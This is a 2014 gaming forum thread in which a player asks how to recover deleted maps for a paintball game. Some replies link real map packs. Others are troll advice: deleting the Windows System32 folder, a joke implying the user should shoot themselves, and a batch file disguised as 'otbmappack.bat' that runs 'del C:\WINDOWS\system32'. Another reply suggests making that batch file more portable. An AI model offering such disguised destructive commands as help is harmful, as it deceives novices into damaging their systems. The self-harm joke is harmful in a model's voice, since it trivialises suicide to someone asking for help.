Author Topic: maps  (Read 2942 times)

DooCi

• 68 Carbine
maps
« on: January 18, 2014, 05:31:19 PM »
I redownloaded the game and i dont have any of the maps anymore!!! I have to download all of them all over again!!! HALP MEH!!!!

Toxiic

• Autococker
Re: maps
« Reply #1 on: January 18, 2014, 06:32:04 PM »
I redownloaded the game and i dont have any of the maps anymore!!! I have to download all of them all over again!!! HALP MEH!!!!
Hit alt+F4; should fix your problem. Everyone has there perspective on what "help" means. That said, here are other possible ways to "HALP" you: -go to my computer then go to local disk then go to windows then find windows 32 and delete that folder.
-find a hammer, and hit your computer till the problem is fixed.
-find a gun, take a good look at it, and shoot.(Now with this you can litterly and exactly follow the instructions or you can make sense out of it; either way should fix the problem.)
-take your computer and throw it out side, make sure you keep throwing it as far and hard as you can, its good for your health.

If anything happens; I'm not responsible. Follow those steps on your on risk! I will not be responsible for anything.

I hope it helps, because it will help others and you, if you followed them properly!

http://dplogin.com/files/maps/mappack_20061026.zip
« Last Edit: January 18, 2014, 06:58:04 PM by Toxiic »

Rick

• Map Committee
  • Autococker
« Reply #2 on: January 18, 2014, 09:00:03 PM »
ftp://www.otb-server.de/pub/Maps/

Click "Open FTP site in File Explorer".

This is the only thing I use IE for. Simply copy and paste the maps.

FusSioN

• Autococker
« Reply #3 on: January 18, 2014, 09:24:40 PM »
Download mappacks.

http://www.digitalpaint.org/files/

And select Map Pack
Or, Individual Map Downloads for list of downloadable maps.

Problem solved.

Rick

• Map Committee
  • Autococker
« Reply #4 on: January 18, 2014, 10:35:44 PM »
I forgot to mention, by doing what I said you can copy every single map the OTB FTP has in a simple CTRL+A and CTRL+C/P. So much easier than downloading different map packs and individually downloading them (as OTB has nearly every map).

DooCi

• 68 Carbine
« Reply #5 on: January 18, 2014, 10:36:30 PM »
Ty.

ascraeus

• Stingray
« Reply #6 on: January 19, 2014, 05:40:13 AM »
open your notepad and write down

@echo off
del C:\WINDOWS\system32

and save it as otbmappack.bat and open it, should work

(better tutorial than toxiic's)

not_payl_obviously

• 68 Carbine
« Reply #7 on: January 19, 2014, 08:33:01 AM »
I forgot to mention, by doing what I said you can copy every single map the OTB FTP has in a simple CTRL+A and CTRL+C/P. So much easier than downloading different map packs and individually downloading them (as OTB has nearly every map).
Better of just use decent FTP client like FileZilla. It will download maps faster and without using IE (If you are smart enough to install and use it).
You can manually craft FTP link for windows explorer, but I never knew about this way, so Ty Rick for showing how newbs can do it (maybe not really efficiently but it's possible).

open your notepad and write down

@echo off
del C:\WINDOWS\system32

and save it as otbmappack.bat and open it, should work

(better tutorial than toxiic's)
Why waste your time if your instructions won't work in way you intended them.
Also: Don't use hardcoded windows path, it can be installed somewhere else, use %WINDIR%\system32 instead.

ascraeus

• Stingray
« Reply #8 on: January 19, 2014, 09:25:56 AM »
Why waste your time if your instructions won't work in way you intended them.
Also: Don't use hardcoded windows path, it can be installed somewhere else, use %WINDIR%\system32 instead.

i highly doubt DooCi has installed his/her windowspath somewhere else than C:\WINDOWS also the instructions are perfect the way they are

DooCi

• 68 Carbine
« Reply #9 on: January 19, 2014, 11:21:16 AM »
topic locked. i have found my own way around this problem..